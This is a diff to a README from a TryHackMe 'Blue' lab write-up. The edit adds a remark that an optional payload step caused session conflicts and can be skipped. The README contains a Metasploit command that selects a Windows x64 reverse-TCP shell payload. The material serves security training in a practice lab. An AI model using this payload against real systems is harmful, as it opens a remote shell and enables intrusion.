EvanDiamantidis/TryHackMe/Blue/README.md

 As mentioned in the task description this step is optional, however anything that benefits us in our learning process is always welcome!
 <br />
-Having said that, my personal experience using this payload with Blue was problematic due to multiple sessions that interfered both with my console, as well as my overall bandwidth.
+Having said that, my personal experience using this payload with Blue was problematic due to multiple sessions that interfered both with my console, as well as my overall bandwidth, so feel free to skip this in case your run into any issues as well.
 ```
 set payload windows/x64/shell/reverse_tcp
 ```